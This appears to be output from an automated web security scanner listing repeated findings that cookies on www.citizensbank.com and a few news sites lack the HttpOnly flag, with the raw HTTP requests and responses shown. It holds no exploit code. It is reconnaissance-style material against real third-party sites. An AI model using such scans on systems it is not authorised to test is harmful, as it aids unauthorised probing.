HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:39:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:49:28 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 17036
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /open-account.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:16:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fopen-account.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 179
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fopen-account.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal-investing/overview.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 02 Feb 2011 22:18:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.citizensbank.com/personal-investing/default.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: private Content-Length: 0
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /savings-and-cds/cds.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:39:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:49:03 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 33846
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /savings-and-cds/college-saver.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:39:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:49:06 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 35701
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /savings-and-cds/goaltrack-savings.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:17:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:27:11 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 44060
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /savings-and-cds/homebuyer-savings.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:17:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:27:11 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 37376
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /savings-and-cds/money-markets.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:17:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:27:09 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 27434
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /security/ HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:18:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:28:00 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 15127
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_ ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /security/equal-housing-lender.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:18:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:28:00 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 13931
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_ ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /services/standard-overdraft-practices.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:17:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:27:38 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 27487
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /small-business/ HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:38:47 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:48:45 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 24618
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /small-business/business-banking-online.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:38:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:48:45 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 20819
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /small-business/business-checking-accounts.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:17:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:26:59 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 23745
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /small-business/business-loans.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:17:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:27:00 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 24102
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /spanish/ HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:40:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:50:07 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 15918
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_ ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /student-banking/default.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:39:38 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:49:35 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 27414
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /student-banking/overview.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:17:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:27:28 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 21138
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /student-loans/overview.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:40:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:50:13 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 20164
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /tools/SiteMap.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:40:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:49:54 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 174442
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_ ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /tools/leaving.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:17:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: private Content-Length: 0
The following cookies were issued by the application and do not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
HiddenPopup=popup=False; path=/
HiddenError=error=False; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /tools/regionalgateway.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:17:37 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: HiddenPopup=popup=False; path=/ Set-Cookie: HiddenError=error=False; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 17351
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_ ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /trufitstudentloan/ HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:39:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:49:48 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 47626
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CG=US:TX:Dallas; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /2011/TECH/web/01/28/egypt.internet.shutdown/index.html HTTP/1.1 Host: www.cnn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:06:34 GMT Server: Apache Set-Cookie: CG=US:TX:Dallas; path=/ Accept-Ranges: bytes Cache-Control: max-age=60, private Expires: Thu, 03 Feb 2011 01:07:34 GMT Content-Type: text/html Vary: Accept-Encoding,User-Agent Content-Length: 57590 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en"><head><script type="text/javascript" src="http://i.cdn.turner.com/cnn/.element/js/ ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /software/slimbox HTTP/1.1 Host: www.digitalia.be Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /latest-news/science-a-environmental/21129-world-renowned-chefs-join-call-to-boycott-bluefin-.html HTTP/1.1 Host: www.enewspf.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:06:40 GMT Server: Apache X-Powered-By: PHP/5.2.14 Set-Cookie: 15ec327c47efbc617f0bc517ff137074=lencdd7511juth6361pib24dj1; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: ja_teline_iii_tpl=ja_teline_iii; expires=Tue, 24-Jan-2012 01:06:40 GMT; path=/ Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Thu, 03 Feb 2011 01:06:41 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 69019
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns="http://www.w3.org/19 ...[SNIP]...
